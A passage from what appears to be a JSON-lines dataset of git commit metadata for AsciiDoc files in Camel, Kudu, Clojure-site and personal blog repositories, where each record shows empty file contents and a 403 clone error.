ki\/camel,akhettar\/camel,w4tson\/camel,drsquidop\/camel,sverkera\/camel,jarst\/camel,onders86\/camel,mcollovati\/camel,acartapanis\/camel,RohanHart\/camel,chirino\/camel,pkletsko\/camel,sirlatrom\/camel,lburgazzoli\/camel,chirino\/camel,adessaigne\/camel,dmvolod\/camel,anoordover\/camel,sabre1041\/camel,anton-k11\/camel,acartapanis\/camel,allancth\/camel,nikhilvibhav\/camel,akhettar\/camel,Thopap\/camel,christophd\/camel,DariusX\/camel,cunningt\/camel,dmvolod\/camel,chirino\/camel,rmarting\/camel,apache\/camel,mgyongyosi\/camel,gilfernandes\/camel,apache\/camel,snurmine\/camel,mcollovati\/camel,jkorab\/camel,sabre1041\/camel,curso007\/camel,yuruki\/camel,Code
Smell\/camel,lburgazzoli\/apache-camel,cunningt\/camel,bhaveshdt\/camel,drsquidop\/camel,w4tson\/camel,isavin\/camel,JYBESSON\/camel,tdiesler\/camel,Fabryprog\/camel,allancth\/camel,yuruki\/camel,zregvart\/camel,acartapanis\/camel,gilfernandes\/camel,bhaveshdt\/camel,pkletsko\/camel,snurmine\/camel,Thopap\/camel,hqstevenson\/camel,jonmcewen\/camel,lburgazzoli\/camel,ssharma\/camel,nikhilvibhav\/camel,davidkarlsen\/camel,curso007\/camel,punkhorn\/camel-upstream,akhettar\/camel,veithen\/camel,apache\/camel,gnodet\/camel,christophd\/camel,veithen\/camel,w4tson\/camel,snurmine\/camel,veithen\/camel,anoordover\/camel,apache\/camel,CodeSmell\/camel,DariusX\/camel,ullgren\/camel,neoramon\/camel,drsquidop\/camel,sirlatrom\/camel,jarst\/camel,nboukhed\/camel,anton-k11\/camel,pax95\/camel,hqstevenson\/camel,sverkera\/camel,tadayosi\/camel,davidkarlsen\/camel,lburgazzoli\/camel,lburgazzoli\/apache-camel,allancth\/camel,cunningt\/camel,jonmcewen\/camel,zregvart\/camel,RohanHart\/camel,hqstevenson\/camel,kevinearls\/camel,RohanHart\/camel,driseley\/camel,lburgazzoli\/apache-camel,NickCis\/camel,Fabryprog\/camel,jamesnetherton\/camel,NickCis\/camel,akhettar\/camel,christophd\/camel,tlehoux\/camel,sverkera\/camel,ssharma\/camel,zregvart\/camel,objectiser\/camel,bgaudaen\/camel,veithen\/camel,sverkera\/camel,Fabryprog\/camel,sverkera\/camel,anton-k11\/camel,RohanHart\/camel,pmoerenhout\/camel,driseley\/camel,ssharma\/camel,NickCis\/camel,gautric\/camel,salikjan\/camel,w4tson\/camel,pmoerenhout\/camel,jarst\/camel,bgaudaen\/camel,kevinearls\/camel,jarst\/camel,RohanHart\/camel,scranton\/camel,CodeSmell\/camel,neoramon\/camel,RohanHart\/camel,rmarting\/camel,scranton\/camel,mgyongyosi\/camel,alvinkwekel\/camel,pkletsko\/camel,onders86\/camel,lburgazzoli\/camel,curso007\/camel,JYBESSON\/camel,sabre1041\/camel,gautric\/camel,tlehoux\/camel,alvinkwekel\/camel,DariusX\/camel,snurmine\/camel,tkopczynski\/camel,alvinkwekel\/camel,christophd\/camel,anton-k11\/camel,onders86\/camel,tkopczynski\/camel,kevinearls\/camel,gnodet\/camel,tdiesler\/camel,pax95\/camel,yuruki\/camel,jonmcewen\/camel,sirlatrom\/camel,ssharma\/camel,veithen\/camel,ssharma\/camel,acartapanis\/camel,curso007\/camel,allancth\/camel,jarst\/camel,neoramon\/camel,driseley\/camel,tdiesler\/camel,kevinearls\/camel,yuruki\/camel,ullgren\/camel,ullgren\/camel,prashant2402\/camel,isavin\/camel,jonmcewen\/camel,pax95\/camel,dmvolod\/camel,sverkera\/camel,isavin\/camel,neoramon\/camel,objectiser\/camel,nboukhed\/camel,nikhilvibhav\/camel,akhettar\/camel,nboukhed\/camel,gnodet\/camel,lburgazzoli\/camel,hqstevenson\/camel,nboukhed\/camel,anton-k11\/camel,acartapanis\/camel,punkhorn\/camel-upstream,kevinearls\/camel,pax95\/camel,curso007\/camel","old_file":"components\/camel-xmlsecurity\/src\/main\/docs\/secureXML-dataformat.adoc","new_file":"components\/camel-xmlsecurity\/src\/main\/docs\/secureXML-dataformat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4d7c85bca00406d9b77b5d9813c87b93bb52370d","subject":"Update 2015-08-24-Second-post.adoc","message":"Update 2015-08-24-Second-post.adoc","repos":"pascalgrimaud\/hubpress.io,pascalgrimaud\/hubpress.io,pascalgrimaud\/hubpress.io","old_file":"_posts\/2015-08-24-Second-post.adoc","new_file":"_posts\/2015-08-24-Second-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/pascalgrimaud\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7da08da3e678631de05ba838388718d3d022369f","subject":"Update 2016-12-01-hello-world.adoc","message":"Update 2016-12-01-hello-world.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2016-12-01-hello-world.adoc","new_file":"_posts\/2016-12-01-hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d7aca5324a523ef1c4eb6a107b2aaeac0fa6046","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"370689acd143618f4606e8be9855607836a314f1","subject":"never used this one","message":"never used this one\n","repos":"rotty3000\/papersntalks,rotty3000\/papersntalks,rotty3000\/papersntalks","old_file":"2014\/NAS\/LiferayPlatform.adoc","new_file":"2014\/NAS\/LiferayPlatform.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rotty3000\/papersntalks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"488bd2d2366cbc1c7416c36e229eded2f86a8124","subject":"Update 2015-04-12-DAsciidoctor-a-HubPress-mon-opensource-life.adoc","message":"Update 2015-04-12-DAsciidoctor-a-HubPress-mon-opensource-life.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2015-04-12-DAsciidoctor-a-HubPress-mon-opensource-life.adoc","new_file":"_posts\/2015-04-12-DAsciidoctor-a-HubPress-mon-opensource-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4cb07ad0bb753c2be24545d52828797ed1ea97c","subject":"Update 2016-05-22-Recenberg-15th-success-rule-applied-to-life.adoc","message":"Update 2016-05-22-Recenberg-15th-success-rule-applied-to-life.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2016-05-22-Recenberg-15th-success-rule-applied-to-life.adoc","new_file":"_posts\/2016-05-22-Recenberg-15th-success-rule-applied-to-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7c0b722b8dd5c90e1fd08f1e12c56600fca8cab","subject":"Added README.adoc 
symlink","message":"Added README.adoc symlink\n","repos":"Yubico\/yubico-java-client,Yubico\/yubico-java-client","old_file":"v2client\/README.adoc","new_file":"v2client\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-java-client.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"39a445663fac6452192f81c0b2476230482503dc","subject":"Update 2016-12-2-3-D.adoc","message":"Update 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-D.adoc","new_file":"_posts\/2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d2dae0953666b85bcbb85878d9f5629692afb1c","subject":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","message":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dce759670e7c40e360d69e5477c43348487346ea","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54aae8fd95c3f21d6ca21f4265d7677221d9a25d","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c00f99369910026cee6c35ab1d490a812304f4b0","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/10\/22\/deref.adoc","new_file":"content\/news\/2021\/10\/22\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The 
requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"86772b22c745130d337110734a391de0b630b73b","subject":"Update 2017-05-30-Epoch-64-bit-compiler-progress.adoc","message":"Update 2017-05-30-Epoch-64-bit-compiler-progress.adoc","repos":"apoch\/blog,apoch\/blog,apoch\/blog,apoch\/blog","old_file":"_posts\/2017-05-30-Epoch-64-bit-compiler-progress.adoc","new_file":"_posts\/2017-05-30-Epoch-64-bit-compiler-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apoch\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20b3d5191c5b17321f04e5aea231d9023944562c","subject":"[doc] corrected superuser ACL flag name","message":"[doc] corrected superuser ACL flag name\n\nChange-Id: I514d32b1a631220746b778fd19b2c2db382f8cf8\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/6783\nTested-by: Kudu Jenkins\nReviewed-by: Dan Burkert <4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\n","repos":"EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/security.adoc","new_file":"docs\/security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3191fb1872310ae267baf4334d109483770a9387","subject":"Update 2016-03-04-New-System.adoc","message":"Update 2016-03-04-New-System.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-03-04-New-System.adoc","new_file":"_posts\/2016-03-04-New-System.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98a0ab30b94bcb44c93d40a1704fc861b6aa9643","subject":"Update 2016-03-29-First-Post.adoc","message":"Update 2016-03-29-First-Post.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-03-29-First-Post.adoc","new_file":"_posts\/2016-03-29-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"226b9b4b2cc7a12149da4b19d401f4aca38a9932","subject":"Update 2016-06-28-First-post.adoc","message":"Update 
2016-06-28-First-post.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-06-28-First-post.adoc","new_file":"_posts\/2016-06-28-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07b9e119515c412fdde1d37d69fe73b757a2a457","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f78463db5b3927abbc260b394752f6ce26cfe3b7","subject":"Update 2016-04-08-First-Post.adoc","message":"Update 2016-04-08-First-Post.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-08-First-Post.adoc","new_file":"_posts\/2016-04-08-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e32413e27cba40fafbdce34a17357315e9b1986","subject":"create post The Black Friday Deals They Won't Show You...","message":"create post The Black Friday Deals They Won't Show You...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-The-Black-Friday-Deals-They-Wont-Show-You....adoc","new_file":"_posts\/2018-02-26-The-Black-Friday-Deals-They-Wont-Show-You....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"778783838f0ee1008abb3af02c89047e3d1a0bc3","subject":"Update 2015-08-26-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-26-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-26-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-26-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62683067934ed1e7f2e4bd76a674e3dbecdb5ded","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 
2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44528c4bf312b67c2493b39b1fc76ae36f6842cc","subject":"Update 2016-02-15-Hello-World.adoc","message":"Update 2016-02-15-Hello-World.adoc","repos":"thykka\/thykka.github.io,thykka\/thykka.github.io,thykka\/thykka.github.io,thykka\/thykka.github.io","old_file":"_posts\/2016-02-15-Hello-World.adoc","new_file":"_posts\/2016-02-15-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thykka\/thykka.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0413b19b5c643ff8b511b7e781056df592f1e949","subject":"Update 2016-03-17-Hello-world.adoc","message":"Update 2016-03-17-Hello-world.adoc","repos":"quangpc\/quangpc.github.io,quangpc\/quangpc.github.io,quangpc\/quangpc.github.io,quangpc\/quangpc.github.io","old_file":"_posts\/2016-03-17-Hello-world.adoc","new_file":"_posts\/2016-03-17-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quangpc\/quangpc.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"566afcc8edde53904aef66d8e8bdc88d938d3ff2","subject":"Update 2017-10-16-Danphe-BaaS.adoc","message":"Update 2017-10-16-Danphe-BaaS.adoc","repos":"Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs","old_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Nepal-Blockchain\/danphe-blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67d5f172caf193ad53bfc363161468671e3d9589","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/11\/5\/deref.adoc","new_file":"content\/news\/2021\/11\/5\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b91993f2a101f57202dbbe1a9d31e5a200409344","subject":"y2b create post The World's Most Dangerous iPhone Case","message":"y2b create post The World's Most Dangerous iPhone Case","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-28-The%20World's%20Most%20Dangerous%20iPhone%20Case.adoc","new_file":"_posts\/2017-12-28-The%20World's%20Most%20Dangerous%20iPhone%20Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"e88d4ebaca54ee76413b1d85241db0602674d2fc","subject":"Update 2020-01-09-Thinking-about-becoming-a-Neo4j-partner-You-may-want-to-read-this.adoc","message":"Update 2020-01-09-Thinking-about-becoming-a-Neo4j-partner-You-may-want-to-read-this.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2020-01-09-Thinking-about-becoming-a-Neo4j-partner-You-may-want-to-read-this.adoc","new_file":"_posts\/2020-01-09-Thinking-about-becoming-a-Neo4j-partner-You-may-want-to-read-this.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62941c26c6105d96738024a9124317a44ca75773","subject":"add post for ParisJUG 20161115","message":"add post for ParisJUG 20161115\n","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2016-11-16-ParisJUG-Des-builds-incroyablement-rapides-avec-Gradle-Quoi-de-neuf-JEE.adoc","new_file":"_posts\/2016-11-16-ParisJUG-Des-builds-incroyablement-rapides-avec-Gradle-Quoi-de-neuf-JEE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b793fcb71b4a26a43dc11772f89b6b9613527664","subject":"Move user groups from confluence","message":"Move user groups from confluence\n","repos":"clojure\/clojure-site","old_file":"content\/community\/user_groups.adoc","new_file":"content\/community\/user_groups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d0fc64d0dd5e67c6a0e305c8489f2d84ff318dde","subject":"[THORN-2494] provide minimal documentation for the \"cli\" fraction","message":"[THORN-2494] provide minimal documentation for the \"cli\" fraction\n","repos":"wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core","old_file":"fractions\/wildfly\/cli\/README.adoc","new_file":"fractions\/wildfly\/cli\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly-swarm\/wildfly-swarm-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"02eb3c9a5b62284e0b2383c1397d5869b6887589","subject":"Update 2017-05-31-Base-Class-Library-vs-CLR-Core-Fx-vs-Core-Clr.adoc","message":"Update 2017-05-31-Base-Class-Library-vs-CLR-Core-Fx-vs-Core-Clr.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-05-31-Base-Class-Library-vs-CLR-Core-Fx-vs-Core-Clr.adoc","new_file":"_posts\/2017-05-31-Base-Class-Library-vs-CLR-Core-Fx-vs-Core-Clr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57cec447058118df7875eab1fed516cbaf0aac64","subject":"Added integration with hypothes.is annotation service to developer manual","message":"Added integration with hypothes.is 
annotation service to developer manual\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"55d313af3eea53158cc29a2c703a01ee93dafad6","subject":"Update 2017-01-13-vue.adoc","message":"Update 2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0af85f9491521358bf6288a20f5ccf8130923661","subject":"Update 2016-07-02-Smart-Phone-repair.adoc","message":"Update 2016-07-02-Smart-Phone-repair.adoc","repos":"iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io","old_file":"_posts\/2016-07-02-Smart-Phone-repair.adoc","new_file":"_posts\/2016-07-02-Smart-Phone-repair.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iveskins\/iveskins.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ca2c170cb9ae9c86445670aa7f3565e275ffc8b","subject":"Update 2017-03-31-Google-Apps-Script.adoc","message":"Update 2017-03-31-Google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-31-Google-Apps-Script.adoc","new_file":"_posts\/2017-03-31-Google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27f184689ff1e15c1d3f1f47b973b501cca3f67e","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/04\/08\/deref.adoc","new_file":"content\/news\/2022\/04\/08\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2d7cb028f8c4af07c3bdd2d4ef1d6fa78ed5fd72","subject":"add clojureD 2018","message":"add clojureD 2018\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2018\/clojured.adoc","new_file":"content\/events\/2018\/clojured.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"94b066bb3623ee386f24e1ac567303cdd5ee91a6","subject":"[docs] Fix error gflags","message":"[docs] Fix error gflags\n\nChange-Id: Id7d846fbacdd294b13139cfc17dba095aae7aa3e\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12023\nTested-by: Kudu Jenkins\nReviewed-by: Adar Dembo 
